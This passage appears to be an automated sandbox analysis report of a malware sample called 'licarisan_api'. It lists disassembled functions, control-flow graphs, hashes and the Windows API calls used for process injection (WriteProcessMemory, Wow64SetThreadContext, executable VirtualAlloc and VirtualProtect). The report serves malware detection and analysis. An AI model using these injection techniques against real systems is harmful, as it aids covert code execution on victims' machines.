7f39eb-7f3a01 3039->3043 3044 7f3a03-7f3a13 3039->3044 3045 7f3a66-7f3a6d 3043->3045 3044->3039 3046 7f3a19-7f3a2c 3044->3046 3048 7f3aaf-7f3afb 3045->3048 3049 7f3a6f-7f3a7b call 7f3a7d 3045->3049 3046->3039 3047 7f3a32-7f3a42 3046->3047 3050 7f3a44-7f3a4e 3047->3050 3051 7f3a50 3047->3051 3053 7f3b0d 3048->3053 3054 7f3afd-7f3b07 3048->3054 3049->3048 3055 7f3a5a-7f3a60 3050->3055 3051->3055 3053->3027 3054->3036 3054->3053 3055->3045
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: ed5e4b98d152ac195e70f9d8a0f729cc312236136c7a3cd42276b67d2bb83c10
                                    • Instruction ID: 9af72b8f6b88c1bf7c23c0fa23f56631b8ce560b968293fe3f7a7770f020995d
                                    • Opcode Fuzzy Hash: ed5e4b98d152ac195e70f9d8a0f729cc312236136c7a3cd42276b67d2bb83c10
                                    • Instruction Fuzzy Hash: D45129B2D081E89AE7218629DC48BEB7F799B81310F1440F9D58D67341C6BD4FCACB62
                                    Function 00435E45 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 132COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: eb600545453fe36506a7444a9516f61b9dee91236dc7066d2096ca509fae7269
                                    • Instruction ID: 706dcf55066b4740364da7c51d2542e25eabd76fbacc23c04447aa80f2cfae19
                                    • Opcode Fuzzy Hash: eb600545453fe36506a7444a9516f61b9dee91236dc7066d2096ca509fae7269
                                    • Instruction Fuzzy Hash: 4251B3B1C086A49EFB208A14DC44BDB7BB9EB95314F04C0FAD54C56641CA7D9FC98FA2
                                    Function 007F225C Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 124threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3337 7f225c-7f229f 3338 7f22ad 3337->3338 3339 7f22a1-7f22ab 3337->3339 3340 7f22b7-7f22be 3338->3340 3339->3340 3341 7f22ce 3340->3341 3342 7f22c0-7f22cc 3340->3342 3343 7f22df-7f2311 Wow64SetThreadContext 3341->3343 3342->3343 3345 7f2318-7f384a call 7f3833 3343->3345 3353 7f384c-7f3856 3345->3353 3354 7f385b-7f38a6 call 7f3889 3345->3354 3355 7f3b17-7f3b44 call 7f3b45 3353->3355 3360 7f38a8-7f38b2 3354->3360 3361 7f38b7-7f38bd 3354->3361 3360->3355 3362 7f38c3-7f391b 3361->3362 3365 7f3922-7f39e9 3362->3365 3369 7f39eb-7f3a01 3365->3369 3370 7f3a03-7f3a13 3365->3370 3371 7f3a66-7f3a6d 3369->3371 3370->3365 3372 7f3a19-7f3a2c 3370->3372 3374 7f3aaf-7f3afb 3371->3374 3375 7f3a6f-7f3a7b call 7f3a7d 3371->3375 3372->3365 3373 7f3a32-7f3a42 3372->3373 3376 7f3a44-7f3a4e 3373->3376 3377 7f3a50 3373->3377 3379 7f3b0d 3374->3379 3380 7f3afd-7f3b07 3374->3380 3375->3374 3381 7f3a5a-7f3a60 3376->3381 3377->3381 3379->3355 3380->3362 3380->3379 3381->3371
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 0329f8587d6e2dff89767006ec3897e131fc56f8e14a279d1aa91a691c2d076e
                                    • Instruction ID: f933cdd4093289db74cbe3b85e784f61e38394a5bbd73ad9c50b9d5e58f13dc6
                                    • Opcode Fuzzy Hash: 0329f8587d6e2dff89767006ec3897e131fc56f8e14a279d1aa91a691c2d076e
                                    • Instruction Fuzzy Hash: 4A51B671D085A88AE7218614DC48BEABBB6AB85310F1480F9D54D66341C7BD5BC68F62
                                    Function 00436142 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 123memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: 4e237dc89208f8eaa97a1204fc66f3665fb871a989283381a120952dfd1368d2
                                    • Instruction ID: dee7749602e52ec1bda2d3af3831d77f98eb98408824dccde88255bca1aa750d
                                    • Opcode Fuzzy Hash: 4e237dc89208f8eaa97a1204fc66f3665fb871a989283381a120952dfd1368d2
                                    • Instruction Fuzzy Hash: B641F7B1C086A59AFB20CA15CC44BEB7BF5AB85314F04C0FAD48C56241CA7C5EC98F96
                                    Function 0043565B Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 110memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004361CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516137583.0000000000420000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_420000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID: 638<$E$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 544645111-387579111
                                    • Opcode ID: e7a23173d0ec743700dd91cc2bc45caf3d4f11828fced7b5d37f812f4945f1a8
                                    • Instruction ID: 21507ac6968a8fa0d9c6df9afb75aee7d2314607abf1e2ce916fccb047d1017e
                                    • Opcode Fuzzy Hash: e7a23173d0ec743700dd91cc2bc45caf3d4f11828fced7b5d37f812f4945f1a8
                                    • Instruction Fuzzy Hash: 4A4117A1C082A49AF7608615DC44BEB7FB9EB45314F04C0FAD48C56681DABD5FC98FE2
                                    Function 007D1788 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 106threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3877 7d1788-7f2311 Wow64SetThreadContext 3880 7f2318-7f384a call 7f3833 3877->3880 3888 7f384c-7f3856 3880->3888 3889 7f385b-7f38a6 call 7f3889 3880->3889 3890 7f3b17-7f3b44 call 7f3b45 3888->3890 3895 7f38a8-7f38b2 3889->3895 3896 7f38b7-7f38bd 3889->3896 3895->3890 3897 7f38c3-7f391b 3896->3897 3900 7f3922-7f39e9 3897->3900 3904 7f39eb-7f3a01 3900->3904 3905 7f3a03-7f3a13 3900->3905 3906 7f3a66-7f3a6d 3904->3906 3905->3900 3907 7f3a19-7f3a2c 3905->3907 3909 7f3aaf-7f3afb 3906->3909 3910 7f3a6f-7f3a7b call 7f3a7d 3906->3910 3907->3900 3908 7f3a32-7f3a42 3907->3908 3911 7f3a44-7f3a4e 3908->3911 3912 7f3a50 3908->3912 3914 7f3b0d 3909->3914 3915 7f3afd-7f3b07 3909->3915 3910->3909 3916 7f3a5a-7f3a60 3911->3916 3912->3916 3914->3890 3915->3897 3915->3914 3916->3906
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 48bb7151ea35984d100120f047ce79df5e4e7d838e842fb2c3ad98765cf39c9a
                                    • Instruction ID: 5930414c22dbcfce0d56dbfa7522605c45fc72ed060f25bfdf388d58180d9807
                                    • Opcode Fuzzy Hash: 48bb7151ea35984d100120f047ce79df5e4e7d838e842fb2c3ad98765cf39c9a
                                    • Instruction Fuzzy Hash: A341E9B1D081D89AE7218628DC48BEF7F7AAB81710F1440F9D54D66341C6BD4FDA8F62
                                    Function 007EF36F Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 105injectionCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 3918 7ef36f-7efab7 WriteProcessMemory 3920 7efabe-7efbf2 3918->3920 3921 7efab9-7f384a call 7f3833 3918->3921 3926 7efbf4-7efbfe 3920->3926 3927 7efc03-7efc4e 3920->3927 3943 7f384c-7f3856 3921->3943 3944 7f385b-7f38a6 call 7f3889 3921->3944 3929 7efebf-7efed7 call 7efed3 3926->3929 3934 7efc5f-7efcc3 3927->3934 3935 7efc50-7efc5a 3927->3935 3941 7efed9-7efef8 3929->3941 3942 7efcca-7efd91 call 7efcde 3934->3942 3935->3929 3945 7efefe-7effa6 call 7effad 3941->3945 3946 7f080b-7f082a call 7f0823 3941->3946 3980 7efdab-7efdbb 3942->3980 3981 7efd93-7efda9 3942->3981 3948 7f3b17-7f3b44 call 7f3b45 3943->3948 3960 7f38a8-7f38b2 3944->3960 3961 7f38b7-7f38bd 3944->3961 3964 7f0831-7f089e 3946->3964 3965 7f082c call 7f0839 3946->3965 3960->3948 3966 7f38c3-7f391b 3961->3966 3971 7f08af-7f08fa call 7f08d2 3964->3971 3972 7f08a0-7f08aa 3964->3972 3965->3964 3977 7f3922-7f39e9 3966->3977 3988 7f08fc-7f0906 3971->3988 3989 7f090b-7f09a2 call 7f09a4 3971->3989 3975 7f0b6b-7f0b92 call 7f0b80 call 7f0b93 3972->3975 3996 7f39eb-7f3a01 3977->3996 3997 7f3a03-7f3a13 3977->3997 3980->3942 3987 7efdc1-7efdd4 3980->3987 3986 7efe0e-7efe15 3981->3986 3990 7efe57-7efe6a call 7efe6b 3986->3990 3991 7efe17-7efe55 3986->3991 3987->3942 3994 7efdda-7efdea 3987->3994 3988->3975 3989->3975 3990->3929 3991->3929 4001 7efdec-7efdf6 3994->4001 4002 7efdf8 3994->4002 4004 7f3a66-7f3a6d 3996->4004 3997->3977 4005 7f3a19-7f3a2c 3997->4005 4008 7efe02-7efe08 4001->4008 4002->4008 4011 7f3aaf-7f3afb 4004->4011 4012 7f3a6f-7f3a7b call 7f3a7d 4004->4012 4005->3977 4009 7f3a32-7f3a42 4005->4009 4008->3986 4013 7f3a44-7f3a4e 4009->4013 4014 7f3a50 4009->4014 4017 7f3b0d 4011->4017 4018 7f3afd-7f3b07 4011->4018 4012->4011 4019 7f3a5a-7f3a60 4013->4019 4014->4019 4017->3948 4018->3966 4018->4017 4019->4004
                                    APIs
                                    • WriteProcessMemory.KERNELBASE(?,?,?,00000004,?), ref: 007EFAAF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: MemoryProcessWrite
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 3559483778-1470631180
                                    • Opcode ID: 4a8852089da40e10f4bfa471410b8ceb3067e0d0834c854dac3357bdd94c8e1a
                                    • Instruction ID: 31e98b2b1b55bdb614183efcedd898e3b471c350e5d680642cf3801dea87b9ce
                                    • Opcode Fuzzy Hash: 4a8852089da40e10f4bfa471410b8ceb3067e0d0834c854dac3357bdd94c8e1a
                                    • Instruction Fuzzy Hash: FA4118B1D081E89AE7218629DC48BEB7BB99B85310F1480F9D14D66741C6BD8BC5CF62
                                    Function 007F1BC4 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 105threadCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 4024 7f1bc4-7f2311 Wow64SetThreadContext 4026 7f2318-7f384a call 7f3833 4024->4026 4034 7f384c-7f3856 4026->4034 4035 7f385b-7f38a6 call 7f3889 4026->4035 4036 7f3b17-7f3b44 call 7f3b45 4034->4036 4041 7f38a8-7f38b2 4035->4041 4042 7f38b7-7f38bd 4035->4042 4041->4036 4043 7f38c3-7f391b 4042->4043 4046 7f3922-7f39e9 4043->4046 4050 7f39eb-7f3a01 4046->4050 4051 7f3a03-7f3a13 4046->4051 4052 7f3a66-7f3a6d 4050->4052 4051->4046 4053 7f3a19-7f3a2c 4051->4053 4055 7f3aaf-7f3afb 4052->4055 4056 7f3a6f-7f3a7b call 7f3a7d 4052->4056 4053->4046 4054 7f3a32-7f3a42 4053->4054 4057 7f3a44-7f3a4e 4054->4057 4058 7f3a50 4054->4058 4060 7f3b0d 4055->4060 4061 7f3afd-7f3b07 4055->4061 4056->4055 4062 7f3a5a-7f3a60 4057->4062 4058->4062 4060->4036 4061->4043 4061->4060 4062->4052
                                    APIs
                                    • Wow64SetThreadContext.KERNEL32(?,?), ref: 007F22F9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516559420.00000000007C8000.00000040.00000001.01000000.00000003.sdmp, Offset: 007C8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7c8000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: ContextThreadWow64
                                    • String ID: E$OP=6$P$c$e$i$o$r$s$s$t$x
                                    • API String ID: 983334009-1470631180
                                    • Opcode ID: 33260525472a1380cc0af65e326b9cc806291cab59e4e294d333b41034a3d6fc
                                    • Instruction ID: de1e48aba4591682714f9645aab192730c46c56c0173584b362a3c3a2a87b3ba
                                    • Opcode Fuzzy Hash: 33260525472a1380cc0af65e326b9cc806291cab59e4e294d333b41034a3d6fc
                                    • Instruction Fuzzy Hash: E641E9B1D081D89AE7218624DC48BEA7F7AABD1310F1440F9D54D66341C6BD4BDACF62
                                    Function 007AA96F Relevance: 22.7, APIs: 1, Strings: 14, Instructions: 227memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: 85AJ$L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-778880938
                                    • Opcode ID: 23f6ac11d3358f9453fade8d292043e6be5301b448d38bc5e031027f77ebe6f2
                                    • Instruction ID: e531459bb6c2181dabea82323fe613672b56a4796bddae6703a852d0223b8de5
                                    • Opcode Fuzzy Hash: 23f6ac11d3358f9453fade8d292043e6be5301b448d38bc5e031027f77ebe6f2
                                    • Instruction Fuzzy Hash: 4391B4A1D042A89FE721CA24DC05BAABB79EF96300F0441FAD44DA7681D7BD5FC18F52
                                    Function 007AB4A4 Relevance: 22.7, APIs: 1, Strings: 14, Instructions: 194memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$M2DM$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-3382654
                                    • Opcode ID: de4ed013adcdd0794cec4b04884ca9f940f325b3f300a8004b7ba5e87a8e3f39
                                    • Instruction ID: 03462151c1f0bd0444d23a5fea947dbce75a1d5b6e9bf56f61ee544fad5d6715
                                    • Opcode Fuzzy Hash: de4ed013adcdd0794cec4b04884ca9f940f325b3f300a8004b7ba5e87a8e3f39
                                    • Instruction Fuzzy Hash: EC7192A1D042A88BE721CB24DC057AABB75EF96300F0481FAD44DAB681D7BD5BD18F52
                                    Function 007AAE92 Relevance: 21.3, APIs: 1, Strings: 13, Instructions: 260COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: eff7e8f9e7d2d41a2d7a6f9fccf9b4f7df46648db9669baf2ecc79c767516fcf
                                    • Instruction ID: 085e7ad523604c76b70116de714897c63f849b191a9e6cb7c9a355783c11d18e
                                    • Opcode Fuzzy Hash: eff7e8f9e7d2d41a2d7a6f9fccf9b4f7df46648db9669baf2ecc79c767516fcf
                                    • Instruction Fuzzy Hash: ABA190A1D042988FE721CA24DC05BAABA75EF96300F0081FAD44DA7681D7BD5FC68F52
                                    Function 007AAE9F Relevance: 21.3, APIs: 1, Strings: 13, Instructions: 258COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 155a888f732e2cf90f19d1992b5da9ee7e27eefd79c943f6106e1ca72d97dc81
                                    • Instruction ID: c7e412f2e0ec97d9dd43e3dc9d3485e9742a8a641ae623ce984e961deac50349
                                    • Opcode Fuzzy Hash: 155a888f732e2cf90f19d1992b5da9ee7e27eefd79c943f6106e1ca72d97dc81
                                    • Instruction Fuzzy Hash: 53A190A1D042988FE721CA24DC45BAABB79EF96300F0081FAD44DA7681D7BD5FC58F52
                                    Function 007AAE42 Relevance: 21.3, APIs: 1, Strings: 13, Instructions: 254memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 7901f6e022bc6f8cb17126ecaee4748e664063da59d7f1f89220ef1598ec6811
                                    • Instruction ID: 590327bc9a3f8ca6ce14e9b1f84fa6be9d1d4d42032c896e37b4e7bd6083f5b4
                                    • Opcode Fuzzy Hash: 7901f6e022bc6f8cb17126ecaee4748e664063da59d7f1f89220ef1598ec6811
                                    • Instruction Fuzzy Hash: 9BA192A1D042989FE721CB14DC05BAABB75EF96300F0081FAD44DA7681D7BD5EC58F52
                                    Function 007AB0A0 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 245memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 140ec3b85cf0fd9f74505b35067b0b48caf1d82e1fde5a73a743d5aa68b74f0a
                                    • Instruction ID: b268ab5c110f7f2e9d46b29689c45730363c2cbdeb28fe5fa6fae24220e3c243
                                    • Opcode Fuzzy Hash: 140ec3b85cf0fd9f74505b35067b0b48caf1d82e1fde5a73a743d5aa68b74f0a
                                    • Instruction Fuzzy Hash: 98A191A1D042988FE721CA24DC05BAABB79EF96300F0081FAD44DA7681D7BD5FC58F52
                                    Function 007AA995 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 208memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 54733a29b3106ae1dbdffa3bb1788defd4178ce2171f2775dceec36737d54711
                                    • Instruction ID: d39731cd10bc5027b4e547b795857bab911c17605b5751d427c1e53d8407e215
                                    • Opcode Fuzzy Hash: 54733a29b3106ae1dbdffa3bb1788defd4178ce2171f2775dceec36737d54711
                                    • Instruction Fuzzy Hash: 2C81A2A1D042A88BE721CB24DC057EABB79EF96300F0481FAD44DA7681D6BD5FC18F52
                                    Function 007AB462 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 204memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: d1f8e6eb12f0bad719aff781eb322c12d3d9a848e8b5901f9ee64959e3b57f38
                                    • Instruction ID: 5f95ff55ce789fd47c2a5f9e96d24a2e36d979797a29221a74481c96a9866ddf
                                    • Opcode Fuzzy Hash: d1f8e6eb12f0bad719aff781eb322c12d3d9a848e8b5901f9ee64959e3b57f38
                                    • Instruction Fuzzy Hash: D08160A1E042A88FE721CB24DC057AABB75EF96300F0481FAD44DA7681D7BD5BD18F52
                                    Function 007AB231 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 378a57f07455c2ae2e39ef6f8b50597b1bba7d58380272705faeea97eb8b810b
                                    • Instruction ID: c9ffa198a1dcfc4929fd1503ab321a1e8a4f73a1d684130829fdc65c5ff8c5d7
                                    • Opcode Fuzzy Hash: 378a57f07455c2ae2e39ef6f8b50597b1bba7d58380272705faeea97eb8b810b
                                    • Instruction Fuzzy Hash: 038170A1E042A88FE721CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    Function 007AB20C Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 13b88bec2a84d3e17a761713cc4f761413e2f569f75df67eaea74bf6704ccfb8
                                    • Instruction ID: d0349d9a56cbdf954737a60e8621e534ca739178fcb75aff852d98f9fd8c6222
                                    • Opcode Fuzzy Hash: 13b88bec2a84d3e17a761713cc4f761413e2f569f75df67eaea74bf6704ccfb8
                                    • Instruction Fuzzy Hash: CF8170A1E042A88FE721CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    Function 007AB1DA Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 202memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 73e150148d63bc46cac6940ed79fae621a8b402b12665e32c42d3b3043d7b2dc
                                    • Instruction ID: 452fece6b3b4d6655650e53adbde8c6203dbaf159150dfecf47d058b22672716
                                    • Opcode Fuzzy Hash: 73e150148d63bc46cac6940ed79fae621a8b402b12665e32c42d3b3043d7b2dc
                                    • Instruction Fuzzy Hash: 7B8170A1E042A88FE725CB24DC057AABB75EF96300F0081FAD44DA7681D7BD5BD18F52
                                    Function 007AADC2 Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 201memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1516483994.00000000007A5000.00000040.00000001.01000000.00000003.sdmp, Offset: 007A5000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7a5000_licarisan_api.jbxd
                                    Similarity
                                    • API ID: AllocVirtual
                                    • String ID: L$L$W$a$a$b$d$i$j@h$o$r$r$y
                                    • API String ID: 4275171209-1069717143
                                    • Opcode ID: 6becd6adb7e552c2b6ed888cc474c9cc23616bacffe3f109e81fc6e26bed4237
                                    • Instruction ID: 676b2587a3376b01d62230152333cd638ff4d94446436a0ae730cb9825a159ab
                                    • Opcode Fuzzy Hash: 6becd6adb7e552c2b6ed888cc474c9cc23616bacffe3f109e81fc6e26bed4237
                                    • Instruction Fuzzy Hash: 4D8192A1D042A88BE721CB24DC057AABB75EF96300F0481FAD44DAB681D7BD5BD18F52
                                    Function 007AB4AB Relevance: 21.2, APIs: 1, Strings: 13, Instructions: 198memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040,?,?,?,?,?,00000000,007AAE41,?,?,?,?,?), ref: 007AB525
                                    Strings
                                    Memory Dump Source
